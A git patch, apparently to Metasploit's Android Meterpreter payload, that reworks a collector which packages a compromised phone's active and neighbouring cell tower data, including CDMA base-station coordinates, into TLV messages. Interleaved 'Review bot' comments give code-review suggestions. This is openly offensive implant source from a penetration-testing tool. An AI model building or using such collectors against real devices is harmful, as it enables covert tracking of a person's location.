From 3ce9cdaf1755c7ea6fd20275d718e564d08c27db Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Mon, 2 Nov 2015 21:52:39 -0600
Subject: [PATCH] Finish up first rework of CellCollector
---
 .../metasploit/meterpreter/CellCollector.java | 46 +++++++++++++++----
 .../meterpreter/android/interval_collect.java | 35 +++++++++++---
 2 files changed, 66 insertions(+), 15 deletions(-)
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/CellCollector.java b/java/androidpayload/library/src/com/metasploit/meterpreter/CellCollector.java
index 73dc44d0..3cbac613 100644
--- a/java/androidpayload/library/src/com/metasploit/meterpreter/CellCollector.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/CellCollector.java
@@ -230,7 +230,6 @@ public class CellCollector extends IntervalCollector {
 // -> Short( psc )
 // -> Short( rssi )
- output.writeLong(this.timeout);
 output.writeInt(this.collections.size());
 for (Long ts : this.collections.keySet()) {
@@ -277,18 +276,47 @@ public class CellCollector extends IntervalCollector {
 long timestamp = ts.longValue();
 CellResult result = collections.get(timestamp);
- TLVPacket resultSet = new TLVPacket();
- TLVPacket CellSet = new TLVPacket();
+ TLVPacket activeCell = new TLVPacket();
+ TLVPacket neighbors = new TLVPacket();
+ TLVPacket cellSet = new TLVPacket();
+ TLVPacket resultSet = new TLVPacket();
 resultSet.add(interval_collect.TLV_TYPE_COLLECT_RESULT_TIMESTAMP, timestamp / 1000);
- /*
- CellSet.add(interval_collect.TLV_TYPE_GEO_LAT, Double.toString(geoLoc.mLatitude));
- CellSet.add(interval_collect.TLV_TYPE_GEO_LONG, Double.toString(geoLoc.mLongitude));
- resultSet.addOverflow(interval_collect.TLV_TYPE_COLLECT_RESULT_GEO, CellSet);
+ switch(result.active.ptype) {
+ case TelephonyManager.PHONE_TYPE_GSM:
+ activeCell.add(interval_collect.TLV_TYPE_CELL_CID, result.active.gsm.mCid);
+ activeCell.add(interval_collect.TLV_TYPE_CELL_LAC, result.active.gsm.mLac);
+ activeCell.add(interval_collect.TLV_TYPE_CELL_PSC, result.active.gsm.mPsc);
+ cellSet.addOverflow(interval_collect.TLV_TYPE_CELL_ACTIVE_GSM, activeCell);
+ break;
+
+ case TelephonyManager.PHONE_TYPE_CDMA:
+ activeCell.add(interval_collect.TLV_TYPE_CELL_BASE_ID, result.active.cdma.mBaseId);
+ activeCell.add(interval_collect.TLV_TYPE_CELL_BASE_LAT, result.active.cdma.mBaseLat);
+ activeCell.add(interval_collect.TLV_TYPE_CELL_BASE_LONG, result.active.cdma.mBaseLong);
+ activeCell.add(interval_collect.TLV_TYPE_CELL_NET_ID, result.active.cdma.mNetId);
+ activeCell.add(interval_collect.TLV_TYPE_CELL_SYSTEM_ID, result.active.cdma.mSystemId);
+ cellSet.addOverflow(interval_collect.TLV_TYPE_CELL_ACTIVE_CDMA, activeCell);
+ break;
+ }
+
+ for (int i=0; i < result.neighbors.size(); i++) {
+ TLVPacket neighbor = new TLVPacket();
+ CellNeighbor cellNeighbor = result.neighbors.get(i);
+
+ neighbor.add(interval_collect.TLV_TYPE_CELL_NET_TYPE, cellNeighbor.mType);
+ neighbor.add(interval_collect.TLV_TYPE_CELL_CID, cellNeighbor.mCid);
+ neighbor.add(interval_collect.TLV_TYPE_CELL_LAC, cellNeighbor.mLac);
+ neighbor.add(interval_collect.TLV_TYPE_CELL_PSC, cellNeighbor.mPsc);
+ // Convert signal strength back to negative dBm on the other side
+ neighbor.add(interval_collect.TLV_TYPE_CELL_RSSI, Math.abs(cellNeighbor.mRssi));
+ cellSet.addOverflow(interval_collect.TLV_TYPE_CELL_NEIGHBOR, neighbor);
+ }
+
+ resultSet.addOverflow(interval_collect.TLV_TYPE_COLLECT_RESULT_CELL, cellSet);
 packet.addOverflow(interval_collect.TLV_TYPE_COLLECT_RESULT_GROUP, resultSet);
- */
 }
 } catch (IOException ex) {
@@ -299,3 +327,5 @@ public class CellCollector extends IntervalCollector {
 }
 }
+
+
diff --git a/java/androidpayload/library/src/com/metasploit/meterpreter/android/interval_collect.java b/java/androidpayload/library/src/com/metasploit/meterpreter/android/interval_collect.java
index 845197e1..8ffd3794 100644
--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/interval_collect.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/interval_collect.java
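Review bot: In CellCollector.java, `switch(result.active.ptype)` handles only `PHONE_TYPE_GSM` and `PHONE_TYPE_CDMA` and has no `default`, so any other phone type yields a cell group with no active-cell entry and no indication why; add `default: break;` with a comment naming the unhandled types, or emit an explicit marker. `result.active`, `.gsm` and `.cdma` are dereferenced without a null check, which is only safe if the collection side always populates them (not visible in this hunk). The local `TLVPacket neighbors` is allocated on every iteration but never used in the visible lines and can be dropped. `Math.abs(cellNeighbor.mRssi)` assumes the stored value is a dBm reading; if it can also hold an unknown-signal sentinel, the receiver's negation will report a false strength, so the comment should state the expected unit and range. The enclosing method starts and ends outside the hunk.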
@@ -49,17 +49,38 @@ public class interval_collect implements Command {
 // TLVs for Cell
 public static final int TLV_TYPE_COLLECT_RESULT_CELL = TLVPacket.TLV_META_TYPE_GROUP
- | (TLV_EXTENSIONS + 9040);
- public static final int TLV_TYPE_CELL_TYPE = TLVPacket.TLV_META_TYPE_STRING
- | (TLV_EXTENSIONS + 9041);
+ | (TLV_EXTENSIONS + 9060);
+ public static final int TLV_TYPE_CELL_ACTIVE_GSM = TLVPacket.TLV_META_TYPE_GROUP
+ | (TLV_EXTENSIONS + 9061);
+ public static final int TLV_TYPE_CELL_ACTIVE_CDMA = TLVPacket.TLV_META_TYPE_GROUP
+ | (TLV_EXTENSIONS + 9062);
+ public static final int TLV_TYPE_CELL_NEIGHBOR = TLVPacket.TLV_META_TYPE_GROUP
+ | (TLV_EXTENSIONS + 9063);
+
+ // TLVs for Cell Neighbors
+ public static final int TLV_TYPE_CELL_NET_TYPE = TLVPacket.TLV_META_TYPE_UINT
+ | (TLV_EXTENSIONS + 9065);
 public static final int TLV_TYPE_CELL_CID = TLVPacket.TLV_META_TYPE_UINT
- | (TLV_EXTENSIONS + 9042);
+ | (TLV_EXTENSIONS + 9066);
 public static final int TLV_TYPE_CELL_LAC = TLVPacket.TLV_META_TYPE_UINT
- | (TLV_EXTENSIONS + 9043);
+ | (TLV_EXTENSIONS + 9067);
 public static final int TLV_TYPE_CELL_PSC = TLVPacket.TLV_META_TYPE_UINT
- | (TLV_EXTENSIONS + 9044);
+ | (TLV_EXTENSIONS + 9068);
 public static final int TLV_TYPE_CELL_RSSI = TLVPacket.TLV_META_TYPE_UINT
- | (TLV_EXTENSIONS + 9045);
+ | (TLV_EXTENSIONS + 9069);
+
+ // TLVs for CDMA networks
+ public static final int TLV_TYPE_CELL_BASE_ID = TLVPacket.TLV_META_TYPE_UINT
+ | (TLV_EXTENSIONS + 9070);
+ public static final int TLV_TYPE_CELL_BASE_LAT = TLVPacket.TLV_META_TYPE_UINT
+ | (TLV_EXTENSIONS + 9071);
+ public static final int TLV_TYPE_CELL_BASE_LONG = TLVPacket.TLV_META_TYPE_UINT
+ | (TLV_EXTENSIONS + 9072);
+ public static final int TLV_TYPE_CELL_NET_ID = TLVPacket.TLV_META_TYPE_UINT
+ | (TLV_EXTENSIONS + 9073);
+ public static final int TLV_TYPE_CELL_SYSTEM_ID = TLVPacket.TLV_META_TYPE_UINT
+ | (TLV_EXTENSIONS + 9074);
+
+
 @Override public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
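Review bot: `TLV_TYPE_CELL_BASE_LAT` and `TLV_TYPE_CELL_BASE_LONG` are declared as `TLV_META_TYPE_UINT`, yet a base-station latitude or longitude is a signed quantity, so negative values will appear on the wire as large unsigned numbers unless the receiver reinterprets them as signed 32-bit; the same would apply to CID/LAC/PSC if an unknown value is stored as -1 (presumably; the collection code is not visible here). A comment on the CDMA group such as `// BASE_LAT/BASE_LONG carry a signed int in a UINT TLV; decode as int32` would make the contract explicit. The hunk also renumbers existing IDs (`TLV_TYPE_CELL_CID` moves from 9042 to 9066, and so on) and skips 9064 without explanation, so both ends of the protocol must change together; a one-line comment stating the reserved range would help. The class body continues outside the hunk.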